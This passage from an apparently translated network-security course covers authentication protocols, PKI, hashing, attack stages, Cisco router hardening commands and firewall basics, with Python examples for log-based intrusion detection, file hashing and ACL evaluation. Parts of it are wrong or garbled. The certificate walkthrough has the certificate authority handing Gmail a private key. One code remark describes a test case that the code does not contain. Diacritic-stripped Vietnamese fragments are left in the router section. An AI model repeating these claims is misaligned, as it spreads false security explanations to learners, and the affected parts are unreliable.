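    print(pap_authenticate_request("remote-user", "s3cret"))            # password visible
    print(chap_exchange(auth, "remote-user", SECRETS["remote-user"]))   # True
    print(chap_exchange(auth, "remote-user", b"wrong secret"))          # False
```

Note that CHAP only hides the secret in transit; the server still has to store the secret in a recoverable form to compute the expected response, which is why the server-side secret store needs the same protection as a password file.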

- Kerberos
An authentication method in which the username/password is not sent over the network
(e.g. Microsoft Active Directory uses Kerberos authentication). Kerberos can be
described by analogy with going to the cinema:


+ First the user must have a username/password with permissions (to see a film you
must have money).
+ The user requests a service (the viewer wants to see a film showing at a given time).
+ The user presents their credentials to the authenticator (hands over money to buy a
ticket).
+ The KDC server grants the user the authority to use the service (the box office hands
the buyer a ticket).
+ The user takes the granted authority to the service server (the viewer takes the
ticket to the screening room, where the usher checks it).
Kerberos can be described by the following steps (figure in the original):

- Multi-factor
An authentication method using several factors. For example, to use a bank's ATM
service you need the bank card plus a PIN (that is authentication based on 2 factors).
Some services also combine several authentication methods to raise the level of
security.

- Certificate

An authentication method used widely on the Internet that provides secure
authentication for users. When content is encrypted and sent, only the Private Key can
decrypt it, and the Private Key is normally never sent over the network.
Example of the normal authentication process when a user accesses Gmail:
Step 1: the user browses to gmail.com.
Step 2: Gmail sends a request to VeriSign to obtain a Certificate.
Step 3: VeriSign returns the Certificate to Gmail, consisting of the Public Key and the
Private Key.
Step 4: Gmail sends the user the Public Key to encrypt the authentication data.
Step 5: the user encrypts with the Public Key and sends the result to Gmail.
Step 6: Gmail decrypts with the Private Key.
This authentication method is not safe when the machine is infected with malware such
as a keylogger: the user can still lose their username/password.
- RSA
RSA is a reliable and secure authentication method for authentication and the transfer
of information on the Internet. RSA overcomes some of the weaknesses of Certificate
authentication. It is the method often used in banking transactions.

- Biometric

An authentication method that uses biometrics to identify the user, such as
fingerprint, vein pattern, iris, voice or face.

5. Authorization
a. Authorization basics
Authorization (in Vietnamese: sự cấp quyền, the granting of rights) is the granting of
rights to a user in a system after the user has been authenticated (Authentication).
Authorization expresses the rights a user may exercise on the system.
Authorization works directly with access control (Access Control).
Example: in Windows, after a user logs on (Authentication) the system grants rights
over:
- Files and folders, through NTFS Permissions: the rights to read, write, delete and
modify; these are the permissions the user has been granted on files and folders.
- The system itself, through User Rights: rights to change the system, such as remote
desktop or changing the network card's settings.

b. Authorization methods

- RADIUS
Remote Authentication Dial-in User Service (RADIUS) provides authentication and access
control, using the UDP protocol, for centralized authentication across the whole
network. RADIUS can be used for users connecting through VPN or RAS, or to provide
authentication for any service that supports RADIUS.
RADIUS model authenticating a Wi-Fi network (figure in the original).
- Kerberos

As in the Authentication section.

- TACACS
Terminal Access Controller Access Control System (TACACS) controls access by
authenticating and authorizing in UNIX networks. It works similarly to RADIUS: when a
system needs to authenticate, it passes the username and password to the TACACS server,
which authenticates the user and grants access rights. TACACS uses UDP and TCP on
port 49.
- TACACS+
Extended Terminal Access Controller Access Control System Plus (TACACS+) is a variant
of TACACS. Like RADIUS, TACACS+ provides authentication and authorization, and adds an
Accounting feature for centralized authorization of authentication requests.
- LDAP
Lightweight Directory Access Protocol (LDAP) provides access to directory services and
is integrated into Microsoft Active Directory. LDAP was created as a simplified subset
of the X.500 Directory Access Protocol and uses port 389. LDAP is used very widely in
directory services such as Directory Service Markup Language (DSML), Service Location
Protocol (SLP) and Microsoft Active Directory.
- XTACACS
A version of TACACS developed and offered by Cisco, called Extended Terminal Access
Controller Access Control System (XTACACS). The service extends the TACACS protocol to
support the Accounting and Auditing features that were previously only found in TACACS+
and RADIUS.
- IEEE 802.1x

IEEE 802.1x is a standard for wireless networks; the port it uses depends on the service
providing authentication and authorization, such as RADIUS or TACACS+. The protocol can
be used to secure WPA/WPA2. IPsec is also a fairly common protocol that is used together
with IEEE 802.1x to secure the network.

6. The concept of Accounting

- Monitoring is managing how the system is accessed and how that access takes place.
- Monitoring helps the administrator determine who caused a fault and what the fault
was, so the administrator knows exactly what is needed to restore service as quickly as
possible.
- Monitoring also lets the administrator detect intruders who have entered the system
illegally, and stop the attacks.
- What you access and what you do there also has to be managed, because in practice
60% of attacks come from inside the system and 40% from the Internet. Preventing
attacks from inside the network is very hard, because insiders understand the system
and its security mechanisms.
- The administrator monitors access and authentication attributes to detect attacks
and threats to the system.
- Displaying connections is also very important: through the connections you can
identify where the attacker comes from and what they did.
Monitoring of access and authentication relies on the following main indicators to
detect vulnerabilities and attacks: repeated failed access attempts, connections using
a protocol that is not present on the system, repeated wrong passwords, detection of
network scans, etc.
Monitoring procedure: monitor the system (all logon processes, access-control
processes, and the processes of programs running on the system); monitor network
access (protocols, connections, mail and other access features).

- Monitor the backup feature.
- Monitor the availability, readiness and stability of information.
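As an added example (not code from the original document), the Python script below turns two of the indicators listed above, repeated wrong passwords and network scans, into detection logic run over a handful of constructed log lines. The log lines, addresses and thresholds are constructed for the demonstration; the format loosely follows syslog entries from an SSH daemon and a firewall, and the regular expressions would need adjusting for a real system's log format.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (syslog-like, not taken from a real system).
SAMPLE_LOG = """\
2012-07-01T08:00:01 sshd[101]: Failed password for root from 203.0.113.7 port 51200 ssh2
2012-07-01T08:00:03 sshd[102]: Failed password for root from 203.0.113.7 port 51201 ssh2
2012-07-01T08:00:05 sshd[103]: Failed password for admin from 203.0.113.7 port 51202 ssh2
2012-07-01T08:00:06 sshd[104]: Failed password for admin from 203.0.113.7 port 51203 ssh2
2012-07-01T08:00:08 sshd[105]: Failed password for oracle from 203.0.113.7 port 51204 ssh2
2012-07-01T08:10:00 sshd[106]: Failed password for bob from 192.168.1.20 port 40001 ssh2
2012-07-01T08:10:30 sshd[107]: Accepted password for bob from 192.168.1.20 port 40002 ssh2
2012-07-01T09:00:00 kernel: IN=eth0 SRC=198.51.100.9 DST=10.0.0.5 PROTO=TCP DPT=21
2012-07-01T09:00:00 kernel: IN=eth0 SRC=198.51.100.9 DST=10.0.0.5 PROTO=TCP DPT=22
2012-07-01T09:00:01 kernel: IN=eth0 SRC=198.51.100.9 DST=10.0.0.5 PROTO=TCP DPT=23
2012-07-01T09:00:01 kernel: IN=eth0 SRC=198.51.100.9 DST=10.0.0.5 PROTO=TCP DPT=25
2012-07-01T09:00:02 kernel: IN=eth0 SRC=198.51.100.9 DST=10.0.0.5 PROTO=TCP DPT=80
2012-07-01T09:00:02 kernel: IN=eth0 SRC=198.51.100.9 DST=10.0.0.5 PROTO=TCP DPT=443
2012-07-01T09:05:00 kernel: IN=eth0 SRC=192.168.1.20 DST=10.0.0.5 PROTO=TCP DPT=443
"""

FAILED_RE = re.compile(r"^(\S+) \S+: Failed password for (\S+) from (\S+) port")
FW_RE = re.compile(r"^(\S+) kernel: .*SRC=(\S+) DST=(\S+) PROTO=\S+ DPT=(\d+)")


def detect_failed_logins(log: str, threshold: int = 5,
                         window: timedelta = timedelta(minutes=5)) -> list:
    """Flag sources with >= threshold failed logins inside a sliding time window."""
    by_src = defaultdict(list)
    for line in log.splitlines():
        m = FAILED_RE.match(line)
        if m:
            by_src[m.group(3)].append(datetime.fromisoformat(m.group(1)))
    alerts = []
    for src, times in by_src.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                alerts.append((src, threshold, times[i].isoformat()))
                break                      # one alert per source is enough
    return alerts


def detect_port_scans(log: str, min_ports: int = 5,
                      window: timedelta = timedelta(seconds=10)) -> list:
    """Flag sources that touch >= min_ports distinct destination ports within the window."""
    by_src = defaultdict(list)
    for line in log.splitlines():
        m = FW_RE.match(line)
        if m:
            by_src[m.group(2)].append((datetime.fromisoformat(m.group(1)), int(m.group(4))))
    alerts = []
    for src, events in by_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            ports = {p for t, p in events[i:] if t - t0 <= window}
            if len(ports) >= min_ports:
                alerts.append((src, len(ports)))
                break
    return alerts


if __name__ == "__main__":
    print(detect_failed_logins(SAMPLE_LOG))   # [('203.0.113.7', 5, '2012-07-01T08:00:01')]
    print(detect_port_scans(SAMPLE_LOG))      # [('198.51.100.9', 6)]
```

The single failed login from 192.168.1.20 followed by a success is the normal typo case and is deliberately not flagged; the thresholds are what separate it from the burst of five failures across three account names.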

7. The CIA security triangle

When analysing a secure system we need a methodology. Some data areas require
confidentiality of the information, some require integrity, and all data must be
delivered on request, which is the availability of the system.
- Confidentiality of information
- Integrity of information
- Availability of the system
These are the three corners of the CIA security triangle for an object that needs
protection:

a. Confidentiality
Confidentiality is the level of protection needed to ensure that important data is not
leaked or disclosed.


An attacker can use many methods to achieve the goal of obtaining the information they
want, such as monitoring the network, taking files that contain passwords, or social
engineering.
Information can be exposed because strong encryption is not used when it is transmitted
or stored.
Confidentiality of information is represented by the READ permission.

b. Integrity
Integrity is the level of protection needed to ensure that information can be trusted
not to have been changed, or to have been modified only by authorized people.
An attacker can use many methods to alter the information they target, such as breaking
in past the authentication process or exploiting a security vulnerability in the
system.
This is an important level of information security; every year many organisations and
businesses are attacked through vulnerabilities and have their data altered.
Integrity of information is represented by the MODIFY permission.

c. Availability
"Let me access your data."
"Turn my computer on first."
The responsiveness of information is very important; it expresses the readiness of the
services to serve.
A system's responsiveness is affected by quite a few components: hardware, software or
the backup system.
A system's responsiveness also has to be planned on the basis of the number of users
accessing it and the importance of the data.


8. Cryptography basics
a. Basic concepts of cryptography
A cipher system provides a way to protect information by encrypting it into a form that
can only be read by someone with authority over the system or by a specific user. The
use and creation of such systems is called cryptography.
Cryptography was used very early in human history; before IT existed there were many
encryption methods in use, for example encrypted scripture, the Caesar cipher, and in
World War II the German army used mechanical cipher machines to protect letters on the
battlefield.
Information technology has these basic cryptographic methods:
- Hash functions (HASH)
- Symmetric encryption
- Asymmetric encryption
To understand and study cryptography one must know some concepts:
- Cleartext or Plaintext: data that has not been encrypted
- Ciphertext: data after it has been encrypted
- Encrypt: the process of encryption
- Algorithm: the encryption algorithm used in the encryption process
- Key: the key used by the encryption algorithm in the encryption process
- Decrypt: the process of decryption

b. Hash functions
A hash is a method or algorithm used to check the integrity of data, that is, to check
whether the data has changed.
The two best-known hash algorithms are SHA and MD5.

Data transmitted over the network or stored can certainly be altered. A recipient who
wants to check whether the data is still intact only needs to compare the hash of the
original data with the hash of the data received: if the two hashes are the same the
data is intact and has not been modified, and otherwise it has.
Practice: use MD5 to hash a file.
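As an added example (not code from the original document), the Python script below does the file-hashing practice with the standard library: it hashes a file in chunks with MD5 or SHA-256, verifies the file against a published digest, then flips one byte to show that the check fails afterwards. The sample file is constructed in a temporary location for the demonstration, and the hash_bytes helper is included so that the well-known digests of the string "abc" can be checked.

```python
import hashlib
import hmac
import os
import tempfile


def hash_bytes(data: bytes, algorithm: str = "sha256") -> str:
    """Hex digest of an in-memory byte string."""
    return hashlib.new(algorithm, data).hexdigest()


def hash_file(path: str, algorithm: str = "sha256", chunk_size: int = 64 * 1024) -> str:
    """Hash a file in chunks so that large files never have to be loaded whole."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_file(path: str, expected_hex: str, algorithm: str = "sha256") -> bool:
    """Integrity check: recompute the digest and compare it with the published one."""
    return hmac.compare_digest(hash_file(path, algorithm), expected_hex.lower())


def flip_one_byte(path: str, offset: int = 0) -> None:
    """Simulate tampering in transit: change a single byte of the file."""
    with open(path, "r+b") as f:
        f.seek(offset)
        b = f.read(1)
        f.seek(offset)
        f.write(bytes([b[0] ^ 0x01]))


def demo() -> dict:
    """Write a constructed sample file, hash it, tamper with it, and re-check."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(b"The quick brown fox jumps over the lazy dog\n" * 1000)
        path = tmp.name
    try:
        md5_before = hash_file(path, "md5")
        sha_before = hash_file(path, "sha256")
        ok_before = verify_file(path, sha_before)
        flip_one_byte(path, offset=4)           # one bit changed in a 44 kB file
        ok_after = verify_file(path, sha_before)
        md5_after = hash_file(path, "md5")
    finally:
        os.remove(path)
    return {"md5_before": md5_before, "md5_after": md5_after,
            "verified_before_tamper": ok_before, "verified_after_tamper": ok_after}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

A hash on its own only detects accidental or unauthenticated change: whoever can replace the file can usually replace the published digest too, so in practice the digest is signed or served from a separate trusted channel.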

c. Symmetric encryption
Symmetric Key Cryptography is a cipher system that uses one key for both encryption and
decryption.
This method has the advantage of being easier to use and integrate than asymmetric
encryption, and its encryption and decryption are faster than the asymmetric method.
However, because encryption and decryption use the same key, the key is usually
pre-configured at both ends, sender and receiver (e.g. IPsec), or the shared encrypted
information can only be opened by whoever holds the key.
Symmetric encryption is usually used to encrypt data, while asymmetric encryption is
usually used for authentication and key exchange.
There are many symmetric algorithms, but the most widely used today is AES (Advanced
Encryption Standard).

d. Asymmetric encryption
Asymmetric Key Cryptography is a cipher system that uses a pair of keys, a Public key
and a Private key, for the encryption and decryption process.
Usually the system uses the Public key to encrypt and the Private key to decrypt:


Figure illustrating asymmetric encryption and decryption (figure in the original).

Because generating and distributing keys is complicated, integrating and using this
method is not as easy as symmetric encryption. Encryption and decryption also consume
more resources, so this method is usually used for authenticating users. Nevertheless,
computer systems today are very powerful (e.g. Google's), so the method can also be
used to transmit data.
Implementing this encryption method requires a system for creating, distributing,
managing and troubleshooting the provision of keys (public and private). That system is
called the Public Key Infrastructure (PKI).
The RSA algorithm is an asymmetric encryption algorithm and the most widely used one.
Description of the algorithm (figure in the original):


e. Overview of PKI

For asymmetric encryption algorithms to work, a system is needed for key generation,
key distribution, key management and key policy; that system is called the Public Key
Infrastructure, abbreviated PKI.
PKI is used widely to provide security for applications and networks, access control,
website resources, email protection and much more. PKI protects information by
providing the following features:
- Identity authentication: identification and authentication
- Integrity verification: checking data integrity
- Privacy assurance: ensuring privacy
- Access authorization: granting access to resources
- Transaction authorization: enforcing the granted access to resources
- Nonrepudiation support: support for non-repudiation
Next we need to look at the PKI standards; each PKI standard applies to the following
families of applications and systems:
The PKIX Working Group of the IETF develops Internet standards for PKI based on the
X.509 certificate standard, focusing on:
- X.509 Version 3 Public Key Certificates and X.509 Version 2 Certificate Revocation
Lists (CRLs)
- PKI Management Protocols
- Operational Protocols

- Certificate Policies and Certificate Practice Statements (CPSs)
- Time-stamping, data-certification and validation services.

Where PKIX is developed on the basis of the X.509 Internet standards, the Public Key
Cryptography Standards (PKCS) are data encryption methods developed and published by
RSA Laboratories, now part of RSA. There are 15 specific PKCS documents, for example:
- PKCS #1 RSA Cryptography Standard: recommendations for implementing public key
cryptography based on the RSA algorithm
- PKCS #2 has been merged into PKCS #1
- PKCS #15:
Below is the information in a Certificate following the X.509 standard (figure in the
original).
A PKI system consists of the following components:
- Certificate Authority (CA)


The CA is the central component of the PKI concept. Well-known CA providers include
VeriSign and Entrust. The CA is the system that issues Certificates.
- Registration Authority (RA)
The RA provides authentication to the CA and is treated like a client requesting a
digital certificate.
- Digital Certificates
A digital certificate is data containing public key cryptography material; most
Certificates follow the structure of the X.509 standard, which includes
- Certificate Policies
The policy for digital certificates, identifying how the certificates are used.
Typical items are:
Use for protecting information with the CA
Method of authentication with the CA
Key management
Management of Private Key use
Validity period of the certificate
Renewal
Whether export of the private key is allowed
Minimum length of the Public Key and Private Key
- Certificate Practice Statement
The CPS is a document created and published by the CA that provides information
dependent on how the CA system uses digital certificates. The CPS provides information
the CA uses


For example, above VeriSign is the CA, Thawte SGC CA is the CSP, and the information is
used for the Google accounts service.
- Revocation (revoking keys)
Once digital certificates are in use they can also be revoked. Revocation of a
certificate is carried out before it expires. The revocation process ensures that a
certificate cannot remain valid beyond the period set when the CA created it.
- Trust models
The simplest PKI structure has a single CA. A single CA in the structure can create and
manage certificates, but this model only suits small organisations because of its
simplicity: if the CA fails, every system using the service fails with it. To reduce
the risk, PKI allows a hierarchical structure with a Root CA at the top and tiers of
child CAs below it; the child CAs are managed so that if one fails it can simply be
rebuilt. That is the Trust Model.

f. Practice: encrypting and decrypting with cryptography tools

9. Basic concepts of network attacks

a. The basic steps of an attack
An attack is usually divided into the basic steps below:


Step 1: Reconnaissance
The first step of any attack. The attacker tries to gather as much information about
the target as possible, mainly by two methods (Active/Passive).
Passive: the attacker looks for information about the target through public channels.
Active: the attacker observes the target and even visits its physical location to find
out more.
The aim of this step is to identify the target.

Step 2: Scanning
The second step, performed once the target has been identified. Scanning aims to find
the target's weak points, and from there to draw up a list of every avenue that could
be used to break into the system.

Step 3: Gaining Access
Having found the system's weaknesses, the attacker chooses one or more vulnerabilities
and attacks to take control.

Step 4: Maintaining Access
After a successful attack, to make later access to the system simpler the attacker
usually plants a virus, trojan, backdoor or shellcode.


Step 5: Clearing Tracks
The attacker erases the traces of their access, for example by deleting logs.

b. Some security concepts.

- Threat
An action or situation that can affect security. A threat is a risk to the security of
the system.
- Vulnerability
A security weakness in the system.
- Target of Evaluation
An IT system that is the target of the attack.
- Attack
Network attacks can be divided into two kinds:
+ Active Attack
+ Passive Attack
Attacks on systems can be divided into many other kinds. Obtaining information,
altering information and destroying information are the most basic goals of attacks.
- Exploit
The act of exploiting a security vulnerability.

c. Basic attack methods

- Brute Force
An attack in which the attacker tries simple passwords one after another in order to
guess the user's password. The method only works against simple passwords.
- Dictionary
An attack similar to brute force, but instead of trying passwords one by one the
attacker uses a dictionary of candidate passwords.
- Spoofing
An attack in which a person or a system impersonates another. For example, someone
forges the sender address of an email and sends it without having to authenticate.
- DoS
An attack in which a person or a system makes another system unreachable, or
significantly slower, by exhausting its resources.
- Man-in-the-middle
The attacker somehow places themselves in the traffic flow between two communicating
computers.
- Replay
Example: an authentication completes successfully and the attacker captures the
exchange. When they later need to log in, the attacker replays the captured traffic to
authenticate. That is a Replay attack.
- Session Hijacking
After the user has authenticated successfully, the attacker takes over the
communication session. This form of attack is Session Hijacking.

d. Targets of the different attack types
Attacks can be classified by what they target:
o Operating System: the target is the operating system. Modern operating systems are
very complex, with many services, ports and access modes; vulnerabilities become ever
more complex and patches are sometimes not applied. The attacker exploits the
vulnerabilities in those operating systems.
o Application: the target is the application. Applications are developed by
independent software vendors that sometimes care only about meeting the application's
business needs and forget to secure it. Many applications have vulnerabilities that a
hacker can exploit.
o Shrink Wrap: programs and applications whose source code is leaked, which is also a
very large security hole.
o Misconfiguration: wrong settings on the system sometimes leave openings for the
attacker to exploit.


III. INFRASTRUCTURE SECURITY.

This part covers the following main topics:

Solutions and a roadmap for building network infrastructure security
Designing a secure network model
Security components in the network infrastructure
Securing the operating system
Building an information security policy

1. Solutions and a roadmap for building network infrastructure security

To build a network that is truly secure there must be a sensible roadmap balancing the
requirements against the budget that can be spent, from which the solutions are chosen.
The most suitable solution must balance these factors:
- Required features
- Cost of the solution
- Features
- System performance
Example 1: we cannot build a million-dollar solution to protect an unimportant personal
computer.
Example 2: we need to protect a web system, so Endpoint security features are not what
is needed there.
Example 3: we cannot give up 50% of the system's performance to protection software.
No business or organisation can deploy every security solution at once, so a clear
roadmap is needed. The roadmap must ensure coverage and compatibility between the
solutions, avoiding overlap and conflict. An organisation can use this roadmap to build
an IT infrastructure that meets its security needs.
Below is the roadmap of steps and solutions for building a highly secure network
(figure in the original):


3. Designing a secure network model

For the information security solutions to work without overlap or conflict, a suitable
design model is needed. Below is a model I designed myself, with zones, devices used,
remote access and HA all included:
I have read quite a few books on Security but have not seen one with a modular model
like this; most show simple models that are short on practicality.

Overview of the model, divided into modules:

+ Internet module: router, proxy and bandwidth optimisation, firewall


+ DMZ module: IPS protection and the servers published to the Internet
+ Core module: the routing and switching core of the whole system, where the Access
Control Lists between zones are set up.
+ Server Farm module: holds the critical servers such as database and core banking
servers, monitored by an IDS.
+ Management module: a secure network zone for the management ports of devices and
servers.
+ User zone: provides the network for users at the office.
+ Branch: connections to branch networks across the country.
- Analysis of the security devices:
+ Core router and switch: set up Access Control Lists and ensure HA for all connections
+ Proxy: at the edge, optimising inbound and outbound bandwidth
+ Firewall: opens and closes ports and publishes servers, and terminates VPN
connections
+ IPS: monitors, detects and blocks network attacks
+ Endpoint Security: endpoint solution for workstations and servers
+ Data Loss Prevention solution against data leakage
+ Network Access Control: manages network access

4. Routers and switches
a. Functions of a router
- Routing: routes packets across the network
- NAT: translates IP addresses from private to public and back

- Access Control List: lets the administrator create Access Control Lists that block
ports and IP addresses as required.
b. Functions of a switch
- Switches frames at Layer 2
c. Security on the switch
- VLANs: allow many networks to be created on one switch, containing outbreaks of
viruses or other attacks.
- Port security: pins a fixed set of MAC addresses to a given switch port, which blocks
attacks such as MAC spoofing and ARP spoofing.
d. Security on the router
- The router is a very important device in the network model; it routes, performs NAT
and hosts the ACLs that protect the network from the gateway layer.
Lab: install Packet Tracer 4.0 and test some router commands.
Understanding Access Control Lists

On a Cisco router a standard access list (applying to IP addresses only) is created
with the command:


Router(config)# access-list access list number {permit|deny} source [sourcemask]

p dng Access List va to:

Router (config-if)# ip access-group access-list-number {in|out}

To v p dng Extended Access Control List (cho php p dng cho port v IP).

Router(config)# access-list access-list-number {permit|deny} protocol source


source-mask destination destination mask [operator|operand]

Router(config-if)#ip access-group access-list number {in|out}

Xem li h thng Log trn Router chng ta c th bit c h thng block hay nhng
ai truy cp vo Router.
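The two command forms above decide per packet, top-down, with an implicit "deny any" at the end, and the mask in the command is a wildcard mask (0 bits must match, 1 bits are don't-care), not a subnet mask. The following evaluator is an added example, not code from the document or from Cisco; the list numbers 10 and 110 and the addresses in it are assumed, and it models only the eq/neq/lt/gt port operators. The last test case shows why typing a subnet mask where a wildcard belongs permits hosts from unrelated networks.

```python
"""Cisco-style access-list evaluation: wildcard masks, port operators and the
implicit deny. Added example, not part of the original document."""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple

ANY = ("0.0.0.0", "255.255.255.255")   # the keyword "any": every bit is don't-care


@dataclass
class AclEntry:
    action: str                                  # "permit" or "deny"
    protocol: str                                # "ip" matches every protocol; else "tcp"/"udp"/"icmp"
    src: str                                     # source network
    src_wild: str                                # wildcard mask: 0 = bit must match, 1 = don't care
    dst: str = ANY[0]
    dst_wild: str = ANY[1]
    dst_port: Optional[Tuple[str, int]] = None   # ("eq"|"neq"|"lt"|"gt", port)


def wildcard_match(addr: str, base: str, wildcard: str) -> bool:
    """True when every bit of addr that the wildcard marks as 0 equals that bit of base."""
    a = int(ipaddress.IPv4Address(addr))
    b = int(ipaddress.IPv4Address(base))
    care = 0xFFFFFFFF ^ int(ipaddress.IPv4Address(wildcard))
    return (a & care) == (b & care)


def port_match(op: Optional[Tuple[str, int]], port: Optional[int]) -> bool:
    if op is None:
        return True              # no operator: any port
    if port is None:
        return False             # entry needs a port but the packet carries none (e.g. ICMP)
    name, value = op
    return {"eq": port == value, "neq": port != value,
            "lt": port < value, "gt": port > value}[name]


def evaluate(acl: List[AclEntry], proto: str, src: str, dst: str,
             dport: Optional[int] = None) -> str:
    """Walk the list top-down; the first matching entry decides. No match: implicit deny."""
    for e in acl:
        if e.protocol != "ip" and e.protocol != proto:
            continue
        if not wildcard_match(src, e.src, e.src_wild):
            continue
        if not wildcard_match(dst, e.dst, e.dst_wild):
            continue
        if not port_match(e.dst_port, dport):
            continue
        return e.action
    return "deny"


# Constructed lists (assumed numbers and addresses) and the IOS lines they model:
#   access-list 10 permit 192.168.1.0 0.0.0.255                 (standard: source only)
ACL_10 = [AclEntry("permit", "ip", "192.168.1.0", "0.0.0.255")]
#   access-list 110 permit tcp 192.168.1.0 0.0.0.255 any eq 22
#   access-list 110 deny   tcp any any eq 23
#   access-list 110 permit ip  192.168.1.0 0.0.0.255 any
ACL_110 = [
    AclEntry("permit", "tcp", "192.168.1.0", "0.0.0.255", dst_port=("eq", 22)),
    AclEntry("deny", "tcp", *ANY, dst_port=("eq", 23)),
    AclEntry("permit", "ip", "192.168.1.0", "0.0.0.255"),
]

if __name__ == "__main__":
    print(evaluate(ACL_110, "tcp", "192.168.1.5", "10.0.0.1", 23))   # deny: matched by the telnet entry
    print(evaluate(ACL_110, "tcp", "172.16.0.1", "10.0.0.1", 80))    # deny: implicit deny at the end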
e. Setting up security on a router
Set an IP address on an interface:

Router> enable
Router# configure terminal
Router(config)# interface Ethernet 0
Router(config-if)# ip address 192.168.0.35 255.255.255.0

Set a password for console login:

Router#config terminal
Router(config)#line console 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#

Set a password for remote login:

Router#config terminal
Router(config)#line vty 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#

Create users on the router:

Router#configure terminal
Router(config)#username Auser password u$3r1
Router(config)#username Buser password u$3r2
Router(config)#username Cuser password u$3r3
Router(config)#username Duser password u$3r4
Router(config)#^Z

Set up SSH login on the router:

Router#configure terminal
Router(config)#ip domain-name scp.mil
Router(config)#access-list 23 permit 192.168.51.45
Router(config)#line vty 0 4
Router(config-line)#access-class 23 in
Router(config-line)#exit
Router(config)#username SSHUser password No+3ln3+
Router(config)#line vty 0 4
Router(config-line)#login local
Router(config-line)#exit
Router(config)#
Router#configure terminal
Router(config)#crypto key generate rsa
The name for the keys will be: Router.scp.mil
Choose the size of the key modulus in the range of 360 to 2048 for your General Purpose Keys. Choosing a key modulus greater than 512 may take a few minutes.
How many bits in the modulus [512]: 1024
Generating RSA keys ...
[OK]
Router(config)#
Router#configure terminal
Router(config)#ip ssh timeout 45
Router(config)#^Z
Router#configure terminal
Router(config)#ip ssh authentication-retries 2
Router(config)#^Z
Router#configure terminal
Router(config)#line vty 0 4
Router(config-line)#transport input ssh telnet
Router(config-line)#^Z
Router# show ip ssh

Note that "transport input ssh telnet" still accepts cleartext Telnet logins on the vty lines; "transport input ssh" restricts them to SSH only.
Set up a static route on the router:

MarketingRouter#config terminal
MarketingRouter(config)#ip route 10.0.10.0 255.255.255.0 20.0.20.1
MarketingRouter(config)#^Z
MarketingRouter#

FinanceRouter#config terminal
FinanceRouter(config)#ip route 30.0.30.0 255.255.255.0 20.0.20.2
FinanceRouter(config)#^Z
FinanceRouter#

Set up RIP (dynamic routing) on the router:

LEFT#configure terminal
LEFT(config)#router rip
LEFT(config-router)#network 172.16.0.0
LEFT(config-router)#network 192.168.10.0
LEFT(config-router)#^Z
LEFT#

Hardening the router against ICMP abuse:

Router#config terminal
Router(config)#interface Serial 0
Router(config-if)#no ip unreachables
Router(config-if)#^Z

Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#no ip unreachables
Router(config-if)#interface Serial 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#no ip unreachables
Router(config-if)#interface Serial 1
Router(config-if)#no ip directed-broadcast
Router(config-if)#no ip unreachables
Router(config-if)#^Z

Disable source routing:

Router#config terminal
Router(config)#no ip source-route
Router(config)#^Z
Router#

Small services:

Router#config terminal
Router(config)#no service tcp-small-servers
Router(config)#no service udp-small-servers
Router(config)#^Z
Router#

Disable finger:

Router#config terminal
Router(config)#no service finger
Router(config)#^Z
Router#

Router#config terminal
Router(config)#no ip finger
Router(config)#^Z
Router#

Turn off unnecessary services:

Router#config terminal
Router(config)#no ip bootp server
Router(config)#no ip name-server
Router(config)#no ntp server
Router(config)#no snmp-server
Router(config)#no ip http server
Router(config)#^Z

Create the Access Control Lists (see above).

5. Firewall and Proxy
a. The firewall concept
The term "firewall" comes from a design technique in construction for stopping and limiting fire. In information technology, a firewall is a technique integrated into a network to prevent unauthorized access, in order to protect internal information sources and limit unwanted intrusion into the system. A firewall is described as a defensive perimeter with checkpoints that inspect all inbound and outbound traffic; traffic can be monitored and blocked at these checkpoints.
Private networks connected to the Internet are constantly threatened by attackers. To protect the data inside, a firewall is used. The firewall has a way of letting legitimate users through while stopping illegitimate ones.
A firewall can be a hardware device, a software program running on a secured host, or a combination of both. In every case it must have at least two network interfaces: one for the network it protects and one for the outside network. A firewall can be a gateway or the junction between two networks, usually a private network and a public network such as the Internet. The first firewalls were simple routers.
b. Functions of a firewall
The main function of a firewall is to control the flow of information between the Intranet and the Internet. It establishes the control mechanism for the information flow between the inside network (Intranet) and the Internet:

- Allow or deny services accessing outward.

- Allow or deny services from outside accessing inward.

- Monitor the network data flow between the Internet and the Intranet.

- Control access addresses; block access addresses.

- Control users and their access. Control the content of the information travelling over the network.

A firewall examines all traffic between the two networks to see whether it meets the criteria. If it does, it is routed between the networks; otherwise it is discarded. A firewall filter filters both outbound and inbound traffic. It can also manage access from outside to internal network resources. It can be used to log all attempts to enter the private network and raise an alert quickly when a hostile or unauthorized party breaks in. A firewall can filter packets by their source address, destination address and port number; this is called address filtering. A firewall can also filter particular kinds of network traffic; this is called protocol filtering, because the decision to forward or reject traffic depends on the protocol in use, for example HTTP, FTP or Telnet. A firewall can also filter traffic by the attributes and state of the packet.
Some firewalls have interesting, advanced functions, such as fooling intruders into believing they have broken into the secured system. Basically, it detects the attack and takes it over, leading the attacker along a "hall of mirrors" approach. If the attacker believes they have gotten into part of the system and can go further, the attacker's activity can be logged and monitored.
If the intruder can be kept busy for a while, the administrator can trace them. For example, the finger command can be used to trace the attacker, or a bait file can be created that takes a long time to transfer, after which the file transfer and the attacker's location can be traced through the Internet connection.
c. How a firewall works
Firewall rules work much like a router's Access Control List, but firewall rules can filter packets more deeply than an ACL.
A firewall works closely with the TCP/IP protocol, because this protocol works by splitting the data received from the applications on the network, or more precisely from the services running on top of the protocols (Telnet, SMTP, DNS, SNMP, NFS, ...), into data packets, and gives these packets identifiable addresses so they can be reassembled at the destination when they arrive; therefore every kind of firewall is very much concerned with packets and their address numbers.
The packet filter allows or rejects each packet it receives. It examines the whole datagram to decide whether it satisfies one of the packet filtering rules. These packet filtering rules are based on the information at the head of each packet (the header), which is used to deliver the packet on the network, including:
